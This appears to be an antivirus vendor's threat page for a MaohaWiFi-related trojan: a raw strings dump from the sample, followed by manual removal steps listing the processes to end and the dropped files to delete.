OLEAUT32.dll
SHLWAPI.dll
WTSAPI32.dll
USERENV.dll
GdiplusShutdown
gdiplus.dll
VERSION.dll
dbghelp.dll
GetCPInfo
GetConsoleOutputCP
.?AVRegistryKey@@
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
3"333>3{3
4!424?4[4
8‚8&;8;
4$4)484_4
:&:4:9:|<
6 6$6(6,606
0$0(0,00040
KERNEL32.DLL
mscoree.dll
$"%s" -auto
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
services.exe
explorer.exe
.DEFAULT\Software\MAOHAWIFISTARTFLAG
\MaohaWiFi.exe
"%s" %s
K\MaohaWifiSvr.exe
e\MaohaCrashCatch.dll
\MaohaWiFi.dat
\MaoHaWiFiNet.sys
\MaoHaWiFiNet64.sys
\MaoHaCD.dll
lGlobal\MaohaWifiFileMapping{294DDACF-AA8A-4c4e-97C5-2D80D55933CD}
eGlobal\MaohaWifiNotifyEvent{F2AED1A3-E52A-4891-B749-867F5772733C}
Global\MaohaWifiNotifyReplyEvent{30BBB239-12E1-49d8-B0D8-82BCC7C9A517}
Global\MaohaWifiNotifyCritical{BF0FB343-47B7-4502-8DE5-3C64C103EDDB}
"%s" %s -runbysrv
\MaohaWifiCtrlDll.dll
\IconCache.db
\Microsoft\Windows\Explorer\
EXPLORER.EXE
s\Updater\CheckUpdate.dll
]\pcid.dll
pcid.dll
\maohasubstat.dll
tipsdll.dll
\ipnathlp.dll
Windows Firewall/Internet Connection Sharing (ICS)
%SystemRoot%\System32\svchost.exe -k netsvcs
@%SystemRoot%\System32\ipnathlp.dll,-106
@%SystemRoot%\System32\ipnathlp.dll,-107
%SystemRoot%\System32\ipnathlp.dll
%Program Files%\Maoha\MaohaAP\MaohaWifiSvr.exe
1, 0, 1, 10


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    setup.3.15.exe:3396
    MaohaWifiSvr.exe:3768
    MaohaWifiSvr.exe:632
    MaoHaWiFiSetup_265.exe:3544
    %original file name%.exe:2624

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Program Files%\mgdisk\mgdisk.ssf (2866 bytes)
    %Program Files%\mgdisk\x64\cryptfd.sys (7424 bytes)
    %Program Files%\mgdisk\mgdinst.dll (17121 bytes)
    %Program Files%\mgdisk\uninst.exe (5573 bytes)
    %Program Files%\mgdisk\sqlite3.dll (17369 bytes)
    C:\Windows\System32\drivers\cryptfd.sys (6360 bytes)
    %Program Files%\mgdisk\sciter32.dll (94241 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp\mgdinst.dll (34242 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp\System.dll (23 bytes)
    C:\Users\Public\Documents\XMUpdate\conf.db (507 bytes)
    %Program Files%\mgdisk\mgdisk.exe (8126 bytes)
    %Program Files%\mgdisk\inst.db (7 bytes)
    C:\Users\Public\Desktop\magicdisk.lnk (937 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mgdisk\uninstall magicdisk.lnk (955 bytes)
    %Program Files%\mgdisk\zlib.dll (925 bytes)
    %Program Files%\mgdisk\x86\cryptfd.sys (6784 bytes)
    %Program Files%\mgdisk\mgdisk.db3 (3 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mgdisk\magicdisk.lnk (955 bytes)
    C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE (684 bytes)
    C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\ECF3006D44DA211141391220EE5049F4 (42 bytes)
    C:\Windows\Temp\CabDD63.tmp (48 bytes)
    C:\Windows\Temp\TarDD64.tmp (2712 bytes)
    C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\ECF3006D44DA211141391220EE5049F4 (412 bytes)
    C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE (1 bytes)
    %Program Files%\Maoha\MaohaAP\gzipdll.dll (306 bytes)
    %Program Files%\Maoha\MaohaAP\APDefault.ini (2 bytes)
    %Program Files%\Maoha\MaohaAP\WifiDhcpSvr.dll (214 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\MaohaWiFi.lnk (1 bytes)
    %Program Files%\Maoha\MaohaAP\driver\maohawifipronat64.cat (14 bytes)
    %Program Files%\Maoha\MaohaAP\welcome\img\app_tj.png (723 bytes)
    %Program Files%\Maoha\MaohaAP\ICSDHCP.ini (28 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (52 bytes)
    %Program Files%\Maoha\MaohaAP\Uninst.dar0 (1 bytes)
    %Program Files%\Maoha\MaohaAP\MaohaWifiWin7.dll (264 bytes)
    %Program Files%\Maoha\MaohaAP\welcome\img\logo.png (17 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab75CD.tmp (51 bytes)
    %Program Files%\Maoha\MaohaAP\driver\WifiProNat64.inf (3 bytes)
    %Program Files%\Maoha\MaohaAP\driver\MaohaWifiProNat64.sys (43 bytes)
    %Program Files%\Maoha\MaohaAP\driver\MaohaWifiProNat.sys (38 bytes)
    %Program Files%\Maoha\MaohaAP\MaohaDevMng.dll (195 bytes)
    %Program Files%\Maoha\MaohaAP\Reg\RasMan_XP.bat (24 bytes)
    %Program Files%\Maoha\MaohaAP\driver\DriverInstall_X64.exe (115 bytes)
    %Program Files%\Maoha\MaohaAP\RaWifi.dll (185 bytes)
    %Program Files%\Maoha\MaohaAP\Reg\RasMan_XP.reg (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab75BB.tmp (51 bytes)
    %Program Files%\Maoha\MaohaAP\driver\WifiProNat.inf (3 bytes)
    %Program Files%\Maoha\MaohaAP\ICSDHCP.dll (618 bytes)
    %Program Files%\Maoha\MaohaAP\res\support.dat (35 bytes)
    %Program Files%\Maoha\MaohaAP\7z.dll (921 bytes)
    %Program Files%\Maoha\MaohaAP\maohasubstat.dll (162 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab8B71.tmp (52 bytes)
    %Program Files%\Maoha\MaohaAP\Updater\MaohaWiFiUpg.exe (538 bytes)
    %Program Files%\Maoha\MaohaAP\drv64\drv64.exe (194 bytes)
    %Program Files%\Maoha\MaohaAP\Reg\RasMan_WIN7.bat (26 bytes)
    %Program Files%\Maoha\MaohaAP\dt.exe (13 bytes)
    %Program Files%\Maoha\MaohaAP\uninstall.dll (598 bytes)
    %Program Files%\Maoha\MaohaAP\ext\5.dll (27 bytes)
    %Program Files%\Maoha\MaohaAP\MaohaWifiBase.dll (287 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\MaohaWiFi.lnk (1 bytes)
    %Program Files%\Maoha\MaohaAP\MaoHaCD.dll (50 bytes)
    %Program Files%\Maoha\MaohaAP\maohawificfg.ini (60 bytes)
    %Program Files%\Maoha\MaohaAP\MyTheme.dll (134 bytes)
    %Program Files%\Maoha\MaohaAP\Updater\CheckUpdate.dll (256 bytes)
    %Program Files%\Maoha\MaohaAP\ResLoader.dll (112 bytes)
    %Program Files%\Maoha\MaohaAP\ext\6.dll (70 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar8B72.tmp (2712 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi\卸载MaohaWiFi.lnk (1 bytes)
    %Program Files%\Maoha\MaohaAP\welcome\index.html (6 bytes)
    %Program Files%\Maoha\MaohaAP\ext\3.dll (19 bytes)
    %Program Files%\Maoha\MaohaAP\MaohaWifiSvr.exe (168 bytes)
    %Program Files%\Maoha\MaohaAP\Reg\RasMan_WIN7.reg (16 bytes)
    %Program Files%\Maoha\MaohaAP\tipsdll.dll (237 bytes)
    %Program Files%\Maoha\MaohaAP\WifiHelp64.exe (71 bytes)
    %Program Files%\Maoha\MaohaAP\pcidetect.dll (238 bytes)
    %Program Files%\Maoha\MaohaAP\welcome\img\litlogo.png (1 bytes)
    %Program Files%\Maoha\MaohaAP\drv64\DIFxAPI.dll (519 bytes)
    %Program Files%\Maoha\MaohaAP\softconfig.dll (1595 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar75BC.tmp (2712 bytes)
    %Program Files%\Maoha\MaohaAP\welcome\img\app_logo.png (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (1720 bytes)
    %Program Files%\Maoha\MaohaAP\SmartAction.dll (426 bytes)
    %Program Files%\Maoha\MaohaAP\RaAPAPI.dll (1 bytes)
    %Program Files%\Maoha\MaohaAP\MaohaWifiXP.dll (157 bytes)
    %Program Files%\Maoha\MaohaAP\res\MaohaWiFiDir.ico (226 bytes)
    %Program Files%\Maoha\MaohaAP\Uninst.dar1 (18 bytes)
    %Program Files%\Maoha\MaohaAP\MaoHaWiFiNet.sys (618 bytes)
    %Program Files%\Maoha\MaohaAP\driver\DriverTool.dll (112 bytes)
    %Program Files%\Maoha\MaohaAP\driver\DriverInstall.exe (101 bytes)
    %Program Files%\Maoha\MaohaAP\YunExplorer.exe (680 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar75CE.tmp (2712 bytes)
    %Program Files%\Maoha\MaohaAP\MaoHaWiFiNet64.sys (1 bytes)
    %Program Files%\Maoha\MaohaAP\ApSetting.ini (487 bytes)
    %Program Files%\Maoha\MaohaAP\tips.exe (569 bytes)
    %Program Files%\Maoha\MaohaAP\DIFxAPI.dll (323 bytes)
    %Program Files%\Maoha\MaohaAP\res\MaohaWiFi.ico (226 bytes)
    %Program Files%\Maoha\MaohaAP\SkinBase.dll (125 bytes)
    %Program Files%\Maoha\MaohaAP\PhonetypeData.dat (24 bytes)
    %Program Files%\Maoha\MaohaAP\MaohaWiFi.exe (50 bytes)
    %Program Files%\Maoha\MaohaAP\res\Skin\Skin.rdb (260 bytes)
    %Program Files%\Maoha\MaohaAP\welcome\img\info.png (9 bytes)
    %Program Files%\Maoha\MaohaAP\Uninstall.exe (1399 bytes)
    %Program Files%\Maoha\MaohaAP\ext\1.dll (23 bytes)
    %Program Files%\Maoha\MaohaAP\HWID.ini (11 bytes)
    %Program Files%\Maoha\MaohaAP\ext\4.dll (18 bytes)
    %Program Files%\Maoha\MaohaAP\pcid.dll (244 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi\MaohaWiFi.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\chrome.7z (996985 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Bin\ChannelU.dll (26364175 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\aavc.ini (32 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\chrome.packed.7z (59963 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\UCBrowserSetup.exe (70898 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\config.ini (195 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\7z.dll (1841 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26515\MaoHaWiFiSetup_265.exe (1167614 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\tmp2624aaaaaa (3172 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26512\UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe (81695 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26548\setup.3.15.exe (425601 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
